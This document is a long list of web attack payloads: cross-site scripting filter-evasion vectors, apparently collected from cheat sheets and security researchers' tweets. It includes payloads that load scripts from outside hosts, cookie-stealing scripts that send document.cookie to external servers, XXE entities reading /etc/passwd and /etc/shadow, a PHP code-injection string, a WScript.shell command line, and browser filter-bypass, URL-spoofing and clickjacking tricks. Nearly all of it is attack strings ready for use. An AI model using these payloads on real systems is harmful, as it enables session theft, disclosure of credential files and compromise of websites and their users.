<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; | |
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; | |
<;A HREF=";http://1113982867/";>;XSS<;/A>; | |
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; | |
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; | |
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; | |
<;A HREF=";//www.google.com/";>;XSS<;/A>; | |
<;A HREF=";//google";>;XSS<;/A>; | |
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; | |
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; | |
<;A HREF=";http://google.com/";>;XSS<;/A>; | |
<;A HREF=";http://www.google.com./";>;XSS<;/A>; | |
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; | |
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; | |
<script>document.vulnerable=true;</script> | |
<img SRC="jav ascript:document.vulnerable=true;"> | |
<img SRC="javascript:document.vulnerable=true;"> | |
<img SRC="  javascript:document.vulnerable=true;"> | |
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> | |
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> | |
<script <B>document.vulnerable=true;</script> | |
<img SRC="javascript:document.vulnerable=true;" | |
<iframe src="javascript:document.vulnerable=true; < | |
<script>a=/XSS/\ndocument.vulnerable=true;</script> | |
\";document.vulnerable=true;;// | |
</title><SCRIPT>document.vulnerable=true;</script> | |
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> | |
<body BACKGROUND="javascript:document.vulnerable=true;"> | |
<body ONLOAD=document.vulnerable=true;> | |
<img DYNSRC="javascript:document.vulnerable=true;"> | |
<img LOWSRC="javascript:document.vulnerable=true;"> | |
<bgsound SRC="javascript:document.vulnerable=true;"> | |
<br SIZE="&{document.vulnerable=true}"> | |
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> | |
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> | |
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS | |
<img SRC='vbscript:document.vulnerable=true;'> | |
1script3document.vulnerable=true;1/script3 | |
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> | |
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> | |
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> | |
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> | |
<table BACKGROUND="javascript:document.vulnerable=true;"> | |
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="width: expression(document.vulnerable=true);"> | |
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> | |
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> | |
<XSS STYLE="xss:expression(document.vulnerable=true)"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> | |
<style TYPE="text/javascript">document.vulnerable=true;</style> | |
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> | |
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> | |
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> | |
<base HREF="javascript:document.vulnerable=true;//"> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> | |
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> | |
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> | |
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> | |
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> | |
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- | |
<a href="javascript#document.vulnerable=true;"> | |
<div onmouseover="document.vulnerable=true;"> | |
<img src="javascript:document.vulnerable=true;"> | |
<img dynsrc="javascript:document.vulnerable=true;"> | |
<input type="image" dynsrc="javascript:document.vulnerable=true;"> | |
<bgsound src="javascript:document.vulnerable=true;"> | |
&<script>document.vulnerable=true;</script> | |
&{document.vulnerable=true;}; | |
<img src=&{document.vulnerable=true;};> | |
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> | |
<iframe src="vbscript:document.vulnerable=true;"> | |
<img src="mocha:document.vulnerable=true;"> | |
<img src="livescript:document.vulnerable=true;"> | |
<a href="about:<script>document.vulnerable=true;</script>"> | |
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> | |
<body onload="document.vulnerable=true;"> | |
<div style="background-image: url(javascript:document.vulnerable=true;);"> | |
<div style="behaviour: url([link to code]);"> | |
<div style="binding: url([link to code]);"> | |
<div style="width: expression(document.vulnerable=true;);"> | |
<style type="text/javascript">document.vulnerable=true;</style> | |
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> | |
<style><!--</style><script>document.vulnerable=true;//--></script> | |
<<script>document.vulnerable=true;</script> | |
<![<!--]]<script>document.vulnerable=true;//--></script> | |
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> | |
<img src="blah"onmouseover="document.vulnerable=true;"> | |
<img src="blah>" onmouseover="document.vulnerable=true;"> | |
<xml src="javascript:document.vulnerable=true;"> | |
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> | |
<div datafld="b" dataformatas="html" datasrc="#X"></div> | |
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> | |
<style>@import'http://www.securitycompass.com/xss.css';</style> | |
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> | |
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> | |
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> | |
<script SRC="http://www.securitycompass.com/xss.jpg"></script> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> | |
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> | |
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> | |
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] | |
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; | |
<;/script>;<;script>;alert(1)<;/script>; | |
<;/br style=a:expression(alert())>; | |
<;scrscriptipt>;alert(1)<;/scrscriptipt>; | |
<;br size=\";&;{alert('XSS')}\";>; | |
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out | |
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS STYLE=xss:expression(alert('XSS'))> | |
"><script>alert('XSS')</script> | |
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS STYLE=xss:e/**/xpression(alert('XSS'))> | |
</XSS STYLE=xss:expression(alert('XSS'))> | |
>"><script>alert("XSS")</script>& | |
"><STYLE>@import"javascript:alert('XSS')";</STYLE> | |
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> | |
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> | |
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' | |
"> | |
>" | |
'';!--"<XSS>=&{()} | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> | |
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> | |
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> | |
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> | |
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> | |
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> | |
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> | |
<script>alert('XSS')</script> | |
%3cscript%3ealert('XSS')%3c/script%3e | |
%22%3e%3cscript%3ealert('XSS')%3c/script%3e | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=javascript:alert('XSS')> | |
<img src=xss onerror=alert(1)> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<BODY ONLOAD=alert('XSS')> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
%253cscript%253ealert(1)%253c/script%253e | |
"><s"%2b"cript>alert(document.cookie)</script> | |
foo<script>alert(1)</script> | |
<scr<script>ipt>alert(1)</scr</script>ipt> | |
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<marquee onstart='javascript:alert('1');'>=(◕_◕)= | |
//VECTORS | |
< script > < / script> | |
< | |
< | |
< | |
< | |
< | |
<< | |
<<< | |
"><script>" | |
<script>alert("XSS")</script> | |
<<script>alert("XSS");//<</script> | |
<script>alert(document.cookie)</script> | |
'><script>alert(document.cookie)</script> | |
'><script>alert(document.cookie);</script> | |
";alert('XSS');// | |
%3cscript%3ealert("XSS");%3c/script%3e | |
%3cscript%3ealert(document.cookie);%3c%2fscript%3e | |
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E | |
<script>alert(document.cookie);</script> | |
<script>alert(document.cookie);<script>alert | |
<xss><script>alert('XSS')</script></vulnerable> | |
<IMG%20SRC='javascript:alert(document.cookie)'> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC="javascript:alert('XSS')" | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("'XSS'")`> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG%20SRC='javasc ript:alert(document.cookie)'> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="  javascript:alert('XSS');"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E | |
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script> | |
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} | |
'';!--"<XSS>=&{()} | |
<name>','')); phpinfo(); exit;/*</name> | |
<![CDATA[<script>var n=0;while(true){n;}</script>]]> | |
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> | |
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
TWITTER @xssvector Tweets: | |
<img language=vbs src=<b onerror=alert#1/1#> | |
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.' | |
Reverse 401 basic auth phishing by @jackmasa POC: | |
document.domain='com' chrome/safari same domain suffix cross-domain trick. | |
Safari empty location bar bug by @jackmasa POC: | |
Safari location object pollution tech: by @kinugawamasato | |
Safari URL spoofing about://mmme.me POC: | |
Opera URL spoofing vuln data://mmme.me by @jackmasa POC: | |
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera | |
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F | |
Opera data:message/rfc822 #XSS by @insertScript | |
#IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe> | |
IE cool expression xss <div id="alert(/@0x6D6172696F/)" style="x:expression(eval)(id)"> | |
Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!-- by @cgvwzq | |
Bypass IE8 version flash document object protection by @jackmasa | |
Bypass IE all version flash document object protection by @gainover1 | |
Bypass IE9 flash document object protection by @irsdl | |
Bypass IE8 flash document object protection by @irsdl | |
New XSS vector (#Opera Specific) <sVg><scRipt %00>prompt(/@soaj1664ashar/) | |
IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day | |
<iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome | |
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day | |
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri | |
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox | |
<script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=> #IE | |
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato | |
Components.lookupMethod(self, 'alert')(1) #firefox | |
external.NavigateAndFind(' ',[],[]) #IE #URLredirect | |
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke | |
<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera | |
<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome | |
<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript | |
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox | |
<svg></ y="><x" onload=alert('@0x6D6172696F')> #svg | |
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera | |
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa | |
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake | |
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com | |
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa | |
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox | |
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa | |
<svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun | |
Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a> | |
<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style> | |
<!-- --!><input value="--><body/onload=`alert(/ @jackmasa /)//`"> #IE #XSS | |
Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it. | |
Firefox clipboard-hijack without script and css : http://<img alt="evil/#" width=0 height=0 > | |
<![<img src=x:x onerror=`alert(/ @jackmasa /)//`]--> | |
#E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes | |
#vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356 | |
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')() | |
No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe> | |
<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg> | |
#VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub] | |
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console | |
<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar | |
<![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa | |
<svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa | |
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS | |
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS | |
header('Refresh: 0;url=javascript:alert(1)'); | |
<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::"> | |
<a href="data:text/html,<script>eval(name)</script>" target="alert(' @garethheyes @0x6D6172696F ')">click</a> | |
#CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style> | |
#ES #FF for(location of ['javascript:alert(/ff/)']); | |
#E4X function::['location']='javascript'':alert(/FF/)' | |
HTML5 entity char <a href="javas	cri
pt:alert(' @garethheyes ')">test</a> | |
#Firefox <a href="x:alert(1)" id="test">click</a> <script>eval(test'')</script> by @cgvwzq | |
<div style="color:rgb(''�x:expression(alert(URL=1))"></div> CSS and CSS :P | |
toUpperCase XSS document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase()) by @jackmasa | |
IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356 | |
aha <script src=>alert(/IE|Opera/)</script> | |
Opera bug? <img src=//\ onload=alert(1)> | |
Use 127.1 no 127.0.0.1 by @jackmasa | |
IE vector location='vbscript:alert(1)' | |
#jQuery super less-xss,work in IE: $(URL) 6 chars | |
#Bootstrap tooltip.js XSS; some other plugins (e.g. typeahead, popover) have the same problem //cc @twbootstrap | |
innerText DOM XSS: innerHTML=innerText | |
Using IE XSS filter or Chrome xss auditor to block <meta> url redirect. | |
jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>') | |
IE all version CSRF vector <img lowsrc=//google.com> | |
Timing vector <img src=//ixss.sinaapp.com/sleep.php> | |
Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"> | |
IE9 <script/onload=alert(1)></script> | |
Webkit and FF <style/onload=alert(1)> | |
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P | |
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">') | |
If you want to share your cool vector, please do not hesitate to let me know :) | |
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL | |
New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F | |
#Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes | |
JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke | |
JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr | |
ß=ss <a href="http://ß.lv">click</a> by @_cweb | |
<a href="http://www。example。com">click</a> by @_cweb | |
Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes | |
<a href="http://www﹒example﹒com ">click</a> by @_cweb | |
history.pushState([],[],'/xssvector') HTML5 URL spoofing! | |
Clickjacking with history.forward() and history.back() by @lcamtuf | |
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul | |
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356 | |
Firefox <img src=javascript:while([{}]);> | |
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115 | |
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes | |
IE breaking framebusting vector <script>var location={};</script> | |
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script> | |
Firefox <iframe src=view-source://xxxx.com>; with drag and drop | |
<button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking | |
Dangling markup injection <img src='//evil by @lcamtuf | |
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F | |
DOM clobbering:<form name=location > clobbered location object on IE. | |
DOM clobbering:<form name=document><image name=body> clobbered document->body | |
<isindex formaction=javascript:alert(1)> by @jackmasa | |
Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script> | |
Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes | |
<a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz | |
Opera <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa | |
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88 | |
Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz | |
FF <a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick by @jackmasa | |
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat | |
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F | |
<a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_ | |
FF <img src="jar:!/"> no referrer by @sneak_ | |
No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa | |
<svg><style>*{font-family:'<svg onload=alert(1)>';}</style></svg> by @0x6D6172696F | |
JSLR( @garethheyes ) challenge result: | |
@irsdl challenge result: | |
<body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> Vbscript XHR by @masa141421356 | |
XML Entity XSS by @garethheyes | |
Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa | |
<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes | |
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke | |
<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D | |
<a href="#" onclick="alert(' ');alert(2 ')">name</a> Classic html entity inject vector | |
A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript | |
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F | |
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke | |
<meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato | |
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes | |
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa | |
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F | |
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes | |
FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F | |
<noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE | |
<svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F | |
Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne | |
<svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa | |
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa | |
FF <applet code=javascript:alert('sgl')> by @jackmasa | |
Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script> by LeverOne | |
<script>RuntimeObject("w*")["window"]["alert"](1);</script> IE: a new method to get the window object! by @s_hskz | |
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq | |
IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC: | |
<a href="javascript:alert(1)">click</a> non-IE | |
<a href="feed:javascript:alert(1)">click</a> Firefox | |
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin | |
